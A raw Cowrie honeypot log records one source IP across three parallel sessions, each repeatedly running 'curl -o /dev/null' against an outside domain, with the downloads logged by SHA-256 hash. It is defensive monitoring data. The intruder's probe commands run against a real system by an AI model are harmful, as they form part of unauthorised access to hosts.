{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.592034Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.593812Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.594690Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.598245Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.602130Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.608060Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.640935Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.641912Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.646959Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.651321Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.654873Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.656413Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.657619Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.661709Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.663331Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.711950Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.712689Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.714278Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.715420Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.722080Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.726488Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.755017Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.756022Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.762683Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.765616Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.768363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.769714Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.770564Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.773708Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.775268Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.808768Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.809619Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.813720Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.816125Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.818455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.819462Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.820043Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.823540Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.845273Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.845802Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.858699Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.861777Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.863182Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.863831Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.881268Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.881945Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.884996Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.887590Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.889837Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.892096Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.892738Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.915315Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.916051Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.924736Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.925441Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.929234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.946450Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.947142Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.950338Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.955079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.960004Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.960624Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.978462Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.979149Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.982964Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:18.986776Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.987342Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:18.994081Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.010632Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.011523Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.019661Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.020241Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.023937Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.027345Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:19.028945Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.029622Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.033955Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
